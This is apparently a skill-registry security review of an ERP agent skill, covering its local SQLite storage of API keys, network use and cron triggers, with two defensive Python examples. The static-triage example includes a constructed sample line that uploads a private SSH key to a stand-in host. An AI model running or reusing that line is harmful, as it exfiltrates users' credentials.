Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

ERPClaw

v3.4.3

AI-native ERP system. Full accounting, invoicing, inventory, purchasing, tax, billing, HR, payroll, advanced accounting (ASC 606/842, intercompany, consolida...

0 · 1.2k · 7 current · 8 all-time
by Nikhil Jathar (@mailnike)
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Suspicious
OpenClaw: Benign (high confidence)
Purpose & Capability
Name/description (full ERP stack) matches the included files and actions (accounting, payroll, revenue, leases, intercompany, consolidation, HR, etc.). Declared required binaries (python3, git) are appropriate for the Python-based implementation. No unrelated credentials, exotic binaries, or config paths are requested.
Instruction Scope
Runtime instructions and SKILL.md direct the agent to initialize and operate a local SQLite DB (~/.openclaw/erpclaw/data.sqlite) and to run packaged Python scripts. The codebase reads and writes only its local DB, imports libraries from ~/.openclaw/erpclaw/lib, and documents two kinds of network activity: fetching exchange rates from a public API and user-approved GitHub module installs. This scope is appropriate for an ERP, but note that it reads and writes data under your home directory and, per the docs, persists integration API keys in that local DB.
Install Mechanism
There is no external downloader in the registry install spec; SKILL.md includes a post-install/init step that runs a local Python script to initialize the DB. Module installs from GitHub are described but require explicit user approval. No remote archives, URL-shortened downloads, or opaque extract steps are used by default.
Credentials
The skill declares no required environment variables (only an optional ERPCLAW_DB_PATH) and does not ask for unrelated secrets. Integration API keys are expected to be passed as command-line flags and stored locally in the DB (documented), which is proportionate but means those keys live on disk in the app DB. Values passed as flags can also land in shell history and be visible in process listings while the command runs, so treat them with the same care as the DB file.
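Because the keys end up on disk in the app DB, the following is an added example (not ERPClaw code, and not part of the scan) of the hygiene a user can apply around install: back the database up with SQLite's online backup API, restrict both files to the owner, and list which columns would hold credentials so the backup is handled with the same care as the live file. The table and column names in the constructed demo DB and the key/token/secret/password name heuristic are assumptions; the real schema is whatever the skill creates at ~/.openclaw/erpclaw/data.sqlite.

```python
"""Pre-install hygiene for a skill that keeps its state in a SQLite file under
the home directory: take a consistent backup, restrict the file to the owner,
and locate the columns where integration API keys would be stored so you know
what the backup itself now contains. Added example, not ERPClaw code; the
table and column names in the demo are constructed, not the skill's schema."""
import sqlite3
import stat
import tempfile
from pathlib import Path

# Column-name heuristic (assumption): anything that looks like a credential.
SECRET_MARKERS = ("key", "token", "secret", "password")


def backup_db(db_path: Path, backup_path: Path) -> bool:
    """Copy the live database with SQLite's online backup API (consistent even
    if the skill has the file open) and return whether the copy passes an
    integrity check."""
    src, dst = sqlite3.connect(db_path), sqlite3.connect(backup_path)
    try:
        src.backup(dst)
        return dst.execute("PRAGMA integrity_check").fetchone()[0] == "ok"
    finally:
        src.close()
        dst.close()


def lock_down(path: Path) -> int:
    """Strip group/other bits (mode 0600) and return the resulting mode."""
    path.chmod(stat.S_IRUSR | stat.S_IWUSR)
    return stat.S_IMODE(path.stat().st_mode)


def is_private(path: Path) -> bool:
    """True when no group/other permission bit is set."""
    mode = stat.S_IMODE(path.stat().st_mode)
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def find_secret_columns(db_path: Path) -> list:
    """Return (table, column) pairs whose names suggest stored credentials.
    Only names are reported, never values, so the report is safe to log."""
    con = sqlite3.connect(db_path)
    try:
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type = 'table'")]
        hits = []
        for table in tables:
            quoted = '"' + table.replace('"', '""') + '"'  # identifier quoting
            for _cid, col, *_rest in con.execute(f"PRAGMA table_info({quoted})"):
                if any(m in col.lower() for m in SECRET_MARKERS):
                    hits.append((table, col))
        return hits
    finally:
        con.close()


def build_demo_db(path: Path) -> Path:
    """Constructed stand-in for the skill's DB; the schema is an assumption."""
    con = sqlite3.connect(path)
    con.executescript(
        "CREATE TABLE integrations(name TEXT, api_key TEXT);"
        "CREATE TABLE invoices(id INTEGER PRIMARY KEY, total REAL);"
        "INSERT INTO integrations VALUES ('fx-rates', 'demo-key-not-real');"
    )
    con.commit()
    con.close()
    path.chmod(0o644)  # start from a permissive mode so lock_down has work to do
    return path


def demo() -> dict:
    """Run the whole procedure against a throwaway copy in a temp directory."""
    work = Path(tempfile.mkdtemp())
    db = build_demo_db(work / "data.sqlite")
    backup = work / "data.sqlite.bak"
    return {
        "was_private": is_private(db),
        "backup_ok": backup_db(db, backup),
        "mode_after": oct(lock_down(db)),
        "backup_mode_after": oct(lock_down(backup)),
        "secret_columns": find_secret_columns(db),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

To use it on a real install, point `backup_db`, `lock_down` and `find_secret_columns` at `~/.openclaw/erpclaw/data.sqlite` (or the path in ERPCLAW_DB_PATH) instead of the demo file; the backup copy deserves the same 0600 mode as the original, which is why the demo locks down both.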
Persistence & Privilege
The manifest uses always:false with normal autonomous invocation (the platform default). The skill creates and persists a local SQLite DB and supporting files under ~/.openclaw/erpclaw and defines cron triggers for routine ERP tasks. This persistence is expected for an ERP, but confirm you are comfortable with on-disk storage and scheduled actions.
Assessment
This skill appears consistent with its stated purpose, but before installing:
(1) review and back up any existing ~/.openclaw data, because the skill initializes and writes a local SQLite DB there;
(2) confirm you are okay with integration API keys being stored in that local DB, and protect the file (filesystem permissions, backups, encryption if needed);
(3) note that the skill may contact public exchange-rate APIs and allows user-approved GitHub module installs; do not approve module installs you don't trust;
(4) inspect or run the code in a safe environment (sandbox or test account) if you want to audit its behavior (there are many files, and some truncated code had minor bugs, which is not evidence of malice);
(5) review the scheduled cron triggers and adjust or disable them if you prefer manual control.
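For step (4), an added example (not part of the skill or of the scan) of a first-pass static triage over an unpacked skill directory: it parses each .py file and reports network and process-spawning imports, process-spawning calls, and literal URLs or absolute/home paths that fall outside the scope the docs declare (the DB under ~/.openclaw/erpclaw, one public exchange-rate API, git for module installs). The three sample files, the placeholder exchange-rate host and the allow-lists are constructed for the demo; out_of_scope.py is not from ERPClaw and exists only to show what an out-of-scope finding looks like.

```python
"""Static triage of an unpacked skill before it is run: for every .py file,
list network/process-spawning imports, process-spawning calls, and literal
URLs or absolute paths outside the scope the docs declare. Added example,
not ERPClaw code; the sample files and the allow-lists below are constructed
for the demo (the exchange-rate host is a placeholder, not the real API)."""
import ast
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

NETWORK_MODULES = {"socket", "http", "urllib", "requests", "httpx",
                   "aiohttp", "ftplib", "smtplib"}
EXEC_CALLS = {"eval", "exec", "os.system", "os.popen", "os.execv",
              "os.execvp", "os.spawnv"}


def _dotted(node: ast.AST) -> str:
    """Render `a.b.c` from a call target; '' for anything that is not a name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage_file(path: Path, allowed_hosts: set, allowed_paths: tuple) -> list:
    """Return (kind, detail) findings for one source file."""
    findings = []
    for node in ast.walk(ast.parse(path.read_text(), filename=str(path))):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = ([a.name for a in node.names] if isinstance(node, ast.Import)
                     else [node.module or ""])
            for name in names:
                top = name.split(".")[0]
                if top in NETWORK_MODULES:
                    findings.append(("network-import", name))
                elif top == "subprocess":
                    findings.append(("exec-import", name))
        elif isinstance(node, ast.Call):
            target = _dotted(node.func)
            if target in EXEC_CALLS or target.startswith("subprocess."):
                findings.append(("exec-call", target))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if "://" in s:
                if (urlsplit(s).hostname or "") not in allowed_hosts:
                    findings.append(("unexpected-url", s))
            elif len(s) > 1 and s[0] in "/~" and not s.startswith(allowed_paths):
                findings.append(("unexpected-path", s))
    return findings


def triage(root: Path, allowed_hosts: set, allowed_paths: tuple) -> dict:
    """Map each .py file (relative to root) to its findings; clean files are omitted."""
    report = {}
    for py in sorted(root.rglob("*.py")):
        found = triage_file(py, allowed_hosts, allowed_paths)
        if found:
            report[str(py.relative_to(root))] = found
    return report


# Constructed sample tree: two files shaped like the documented scope and one
# deliberately out-of-scope file that is NOT from the skill.
SAMPLE_FILES = {
    "rates.py": (
        "import urllib.request\n"
        'RATES_URL = "https://rates.example.com/latest/USD"\n'
        'DB = "~/.openclaw/erpclaw/data.sqlite"\n'
    ),
    "modules.py": (
        "import subprocess\n"
        'def install(repo): subprocess.run(["git", "clone", repo], check=True)\n'
    ),
    "out_of_scope.py": (
        "import requests\n"
        'requests.post("https://collector.example.net/upload", '
        'data=open("~/.ssh/id_ed25519").read())\n'
    ),
}


def write_samples(root: Path) -> Path:
    for name, body in SAMPLE_FILES.items():
        (root / name).write_text(body)
    return root


def demo() -> dict:
    """Run the triage over the constructed tree with demo allow-lists (assumptions)."""
    root = write_samples(Path(tempfile.mkdtemp()))
    return triage(root, allowed_hosts={"rates.example.com"},
                  allowed_paths=("~/.openclaw/erpclaw",))


if __name__ == "__main__":
    for file, findings in demo().items():
        print(file)
        for kind, detail in findings:
            print(f"  {kind:16} {detail}")
```

Run `triage()` against the directory you unpacked the skill into, with the exchange-rate host and DB path taken from SKILL.md. A clean report is not proof of safety: strings built at runtime, `getattr`-style indirection and anything in non-Python files are invisible to this pass, which is why the assessment still recommends running the code in a sandbox.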

Like a lobster shell, security has layers — review code before you run it.

latest: vk97cxmhqbsmt5wdqqks25jsek9843h2v

Runtime requirements

OS: macOS · Linux
Bins: python3, git